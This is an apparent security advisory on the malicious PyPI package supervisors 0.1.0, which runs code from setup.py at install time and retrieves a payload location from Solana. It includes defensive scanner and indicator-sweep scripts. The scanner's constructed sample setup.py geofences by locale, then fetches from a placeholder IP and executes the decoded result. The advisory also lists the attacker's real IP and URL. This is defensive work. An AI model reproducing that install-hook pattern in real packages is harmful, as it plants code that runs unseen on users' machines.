Malicious `supervisors` PyPI release fetches payload via Solana
TL;DR — A malicious PyPI package, supervisors 0.1.0, runs code from its setup.py at install time and retrieves the location of a second-stage payload from the Solana blockchain. Anyone who installed it on a developer machine or CI runner should treat that environment as compromised.
What happened
OSV (Open Source Vulnerabilities) published an alert for MAL-2026-2448, flagging the PyPI package supervisors as containing malicious code.
Per the OSV record, the package’s setup.py contains malicious logic that skips execution when the system language is Russian, and otherwise attempts to retrieve a next-stage payload URL from the Solana blockchain using a wallet ID associated with the “Glossworm” campaign.
The report notes that the final payload was not accessible during analysis and states that this “strongly suggests the owner's account was hijacked.” It also points to a likely code origin in a previously hijacked project template (HydroRoll-Team/pyo3-project-template).
This matters for two reasons. First, pip runs setup.py whenever it builds a source distribution, so the malicious code executes with the privileges of the developer or CI account performing the install, where package-index tokens, cloud credentials and signing keys are commonly present. Second, staging the payload location on a public blockchain gives defenders no hosting provider to send a takedown to: the existing entry cannot be removed, and the attacker can point it at new infrastructure at will, which makes both disruption and tracking harder than with conventionally hosted payloads.
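To make the install-time risk concrete, here is an added triage script that is not part of the OSV record or this advisory. It parses a setup.py with Python's ast module and flags the behaviours described above: a locale check used as a geofence, network access, dynamic code execution, embedded URL or IP literals, and a cmdclass override of the install step. The two setup.py samples are constructed for the example; the suspicious one reproduces the described pattern in its simplest form and is not the actual package's code, and the watch-lists are an illustrative starting point rather than a complete policy.

```python
import ast
import re

# Illustrative watch-list of calls a build script rarely needs at install time
# (assumption: a starting point for triage, not a complete policy).
WATCH_CALLS = {
    "urllib.request.urlopen": "install-time network fetch",
    "requests.get": "install-time network fetch",
    "socket.socket": "raw socket at install time",
    "subprocess.run": "spawns a process at install time",
    "subprocess.Popen": "spawns a process at install time",
    "subprocess.check_output": "spawns a process at install time",
    "os.system": "spawns a shell at install time",
    "os.popen": "spawns a shell at install time",
    "locale.getdefaultlocale": "locale check (geofencing pattern)",
    "locale.getlocale": "locale check (geofencing pattern)",
    "base64.b64decode": "decodes an embedded blob",
    "exec": "dynamic code execution",
    "eval": "dynamic code execution",
}
# setuptools command names; overriding them via cmdclass lets package code run
# during build or install.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py", "bdist_wheel"}
URL_RE = re.compile(r"https?://[^\s'\"]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _dotted_name(node):
    """Return 'pkg.attr.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return sorted (lineno, reason) findings for a setup.py source string."""
    tree = ast.parse(source)
    # Resolve 'from x import y as z' / 'import x as z' aliases to full dotted names.
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
        elif isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if not name:
                continue
            root, _, rest = name.partition(".")
            full = aliases.get(root, root) + ("." + rest if rest else "")
            if full in WATCH_CALLS:
                findings.append((node.lineno, f"{full}: {WATCH_CALLS[full]}"))
            if full == "setup" or full.endswith(".setup"):
                for kw in node.keywords:
                    if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                        keys = {k.value for k in kw.value.keys if isinstance(k, ast.Constant)}
                        hit = sorted(INSTALL_HOOKS & keys)
                        if hit:
                            findings.append((node.lineno, f"cmdclass overrides {hit}; review run()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if URL_RE.search(node.value):
                findings.append((node.lineno, f"embedded URL/IP literal: {node.value[:60]}"))
    return sorted(findings)


# Constructed samples for the example. The suspicious one mimics the described
# pattern (geofence, fetch, execute) and is NOT the real package's code.
BENIGN_SETUP = """from setuptools import setup, find_packages

setup(name="demo", version="1.0.0", packages=find_packages())
"""
SUSPICIOUS_SETUP = """import base64
import locale
from urllib.request import urlopen
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        # Geofence, then fetch and run a second stage (constructed pattern only).
        if locale.getdefaultlocale()[0] != "ru_RU":
            blob = urlopen("http://203.0.113.10/stage").read()
            exec(base64.b64decode(blob))

setup(name="demo", version="0.1.0", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, scan_setup_py(src) or "no findings")
```

The scanner is a triage aid, not a verdict: obfuscated code (string-built imports, `getattr` chains, code hidden in a vendored module that setup.py imports) will slip past a static watch-list, and the absence of findings says nothing about code that runs on first import of the installed package rather than at install time.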
Who is impacted
- Any environment that installed the PyPI package supervisors, version 0.1.0.
- Developer workstations and CI build agents are at highest risk, because the secrets typically available to the install step (package-index tokens, cloud credentials, SSH and signing keys) are exposed to code running from setup.py.
| Component | Ecosystem | Affected versions (per OSV) |
|---|---|---|
| supervisors | PyPI | 0.1.0 |
What to do now
- Identify whether supervisors 0.1.0 exists anywhere in your estate (requirements files and lockfiles, internal PyPI mirrors and artifact proxies, build logs, SBOMs and artifact manifests) and quarantine every environment where it was installed.
- If the package was installed on CI runners or build agents, treat it as a potential build-time compromise: review pipeline logs for unexpected network activity, rotate every credential that was available to the build context (package-index tokens, cloud keys, deploy secrets), and rebuild affected agents from a known-good image rather than cleaning them in place.
- Add detection and egress controls for the OSV-listed network indicators (as appropriate for your environment):
  - IP: 217.69.2.135
  - URL: http://217.69.2.135/NrIgZ6I%2BFyCxXHb%2B9FapRg%3D%3D
  - IP:
- Review dependency allowlists and artifact-proxy policies for PyPI to reduce exposure to typosquats and newly published malicious packages, especially first-release packages with no established maintainer history. Where your builds allow it, install with `--only-binary=:all:` and hash-pinned requirements so that an unexpected source distribution cannot run setup.py during install; note that this does not stop code that runs when the installed package is first imported.
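The identification and detection steps above, as one added example that is not tooling from the advisory or from OSV: it sweeps requirements-style files and poetry.lock entries for supervisors==0.1.0, checks the distributions installed in the running interpreter, and matches egress-log lines against the two OSV-listed indicators. The sample requirements, lock and log lines are constructed for the example, and the hash in the requirements sample is a placeholder.

```python
import importlib.metadata
import re

# Indicators from the OSV record for MAL-2026-2448.
PACKAGE = "supervisors"
BAD_VERSIONS = {"0.1.0"}
IOC_IPS = {"217.69.2.135"}
IOC_URLS = {"http://217.69.2.135/NrIgZ6I%2BFyCxXHb%2B9FapRg%3D%3D"}


def normalize(name):
    """PEP 503 normalisation so Supervisors, supervisors and super_visors compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


# Matches 'name==version' at the start of a requirements.txt / pip freeze line.
REQ_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][^\s;#\\]*)")


def find_in_requirements(text):
    """Return 1-based line numbers that pin the affected package version."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.match(line)
        if m and normalize(m.group(1)) == PACKAGE and m.group(2) in BAD_VERSIONS:
            hits.append(n)
    return hits


def find_in_poetry_lock(text):
    """Return line numbers of affected 'version = ...' entries in a poetry.lock."""
    hits, name = [], None
    for n, line in enumerate(text.splitlines(), 1):
        if line.strip() == "[[package]]":
            name = None  # start of a new package block
        m = re.match(r'^\s*(name|version)\s*=\s*"([^"]*)"', line)
        if not m:
            continue
        if m.group(1) == "name":
            name = normalize(m.group(2))
        elif name == PACKAGE and m.group(2) in BAD_VERSIONS:
            hits.append(n)
    return hits


def find_installed():
    """Affected distributions visible to this interpreter (run inside each venv/image)."""
    found = []
    for dist in importlib.metadata.distributions():
        try:
            name = dist.metadata.get("Name") or ""
        except Exception:  # broken metadata on disk; skip rather than abort the sweep
            continue
        if normalize(name) == PACKAGE and dist.version in BAD_VERSIONS:
            found.append(f"{name}=={dist.version}")
    return found


def match_egress_log(lines):
    """Return (line_no, kind, indicator) for lines touching the OSV-listed IP or URL."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in IOC_URLS:
            if url in line:
                hits.append((n, "url", url))
        for ip in IOC_IPS:
            # Boundary check so a shorter indicator (e.g. 10.0.0.1) cannot match 10.0.0.10.
            if re.search(rf"(?<![\d.]){re.escape(ip)}(?![\d.])", line):
                hits.append((n, "ip", ip))
    return hits


# Constructed samples for the example; the hash below is a placeholder, not a real digest.
REQUIREMENTS = """requests==2.32.3
Supervisors == 0.1.0 --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
supervisor==4.2.5
"""
POETRY_LOCK = """[[package]]
name = "supervisor"
version = "4.2.5"

[[package]]
name = "supervisors"
version = "0.1.0"
"""
EGRESS_LOG = [  # constructed proxy log lines
    "2026-03-02T10:14:07Z ci-runner-7 CONNECT 217.69.2.135:80 user=buildbot",
    "2026-03-02T10:14:08Z ci-runner-7 GET http://217.69.2.135/NrIgZ6I%2BFyCxXHb%2B9FapRg%3D%3D 200",
    "2026-03-02T10:15:00Z dev-laptop-3 GET https://pypi.org/simple/requests/ 200",
    "2026-03-02T10:16:31Z ci-runner-2 GET http://217.69.2.13/health 200",
]

if __name__ == "__main__":
    print("requirements lines:", find_in_requirements(REQUIREMENTS))
    print("poetry.lock lines:", find_in_poetry_lock(POETRY_LOCK))
    print("installed here:", find_installed())
    for hit in match_egress_log(EGRESS_LOG):
        print("egress hit:", hit)
```

Two points on the design. The URL's path is a percent-encoded, base64-looking value that may not be constant across requests, so the log matcher checks the host independently of the full URL. And `find_installed` only sees the interpreter it runs in, so run it inside each virtualenv and container image, or query your artifact proxy's download logs, which cover every consumer at once.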
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly, send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.
